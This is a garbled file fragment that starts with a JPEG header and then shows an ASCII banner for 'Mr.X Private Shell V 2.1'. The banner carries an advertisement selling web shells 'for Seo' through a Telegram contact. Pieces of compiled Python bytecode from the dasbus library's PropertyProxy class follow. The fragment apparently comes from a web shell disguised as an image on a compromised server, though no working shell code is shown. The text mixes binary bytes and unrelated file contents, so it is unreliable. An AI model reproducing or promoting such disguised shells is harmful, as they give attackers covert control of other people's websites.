����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
a
F
�`c � @ s d gZ G dd � d e�ZdS )�
PropertyProxyc @ s@ e Zd ZdZddgZdd� Zdd� Zdd � Zd
d� Zdd
� Z dS )r zXProxy of a remote DBus property.
It can be used to define instance attributes.
�_getter�_setterc C s || _ || _dS )z(Create a new proxy of the DBus property.N)r r )�self�getter�setter� r �:/usr/lib/python3.9/site-packages/dasbus/client/property.py�__init__$ s zPropertyProxy.__init__c C s | � dd�S )z#Get the value of the DBus property.N)�__get__)r r r r �get) s zPropertyProxy.getc C s&